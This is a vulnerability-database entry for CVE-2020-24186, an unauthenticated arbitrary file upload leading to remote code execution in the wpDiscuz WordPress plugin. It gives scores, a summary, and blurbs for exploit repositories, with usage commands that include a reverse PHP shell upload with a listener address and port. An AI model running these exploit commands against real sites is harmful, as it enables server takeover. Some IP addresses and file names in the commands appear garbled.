CVE-2020-24186

Published: 24/08/2020 Updated: 01/01/2022
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 670
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 up to and including 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files, via the wmuUploadFiles AJAX action.

Vulnerable Product

gvectors wpdiscuz

Exploits

WordPress wpDiscuz plugin version 7.0.4 unauthenticated remote code execution exploit ...
WordPress wpDiscuz plugin version 7.0.4 remote shell upload exploit ...

Github Repositories

wpDiscuz 7.0.4 Remote Code Execution

POC CVE-2020-24186-wpDiscuz-704-RCE. WordPress wpDiscuz 7.0.4 Remote Code Execution. A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files, via the wmuUploadFiles AJAX action. Exploit Usage Commands: Windows/Linux: $ sudo python3 wpDiscuz_

Scripts to deploy virtual testbed for log data analysis and anomaly detection.

Kyoushi Testbed Environment. This tool allows generating labeled log datasets in simulation testbeds for security evaluations, e.g., IDSs, alert aggregation, or federated learning. The testbed simulates an enterprise IT network, involving mail servers, file share, firewall, intranet, DMZ, DNS, VPN, etc. Log data is collected from many sources, including network traffic, apache

Attack script for CVE-2020-24186

CVE-2020-24186-exploit. Attack script for CVE-2020-24186. Exploit usage: Commands: Windows/Linux: python3 CVE-2020-24186py -u <Base_Host> -p <BlogPost_URL> Example: python3 CVE-2020-24186py -u 127001 -p /wordpress/2022/04/04/hello-world

WpDiscuz 7.0.4 Arbitrary File Upload Exploit

chmod +x CVE-2020-24186 /CVE-2020-24186

CVE-2020-24186 reverse shell upload. Exploit for WpDiscuz 7.0.4 based on the exploit written by h3v0x. Exploits the vulnerability and uploads a reverse PHP shell. Inspiration was the Blogger CTF. exploitpy -u 192168181/blog -p /wordpress/2021/06/blogpost -l '19216819' -s 9001 Example use:
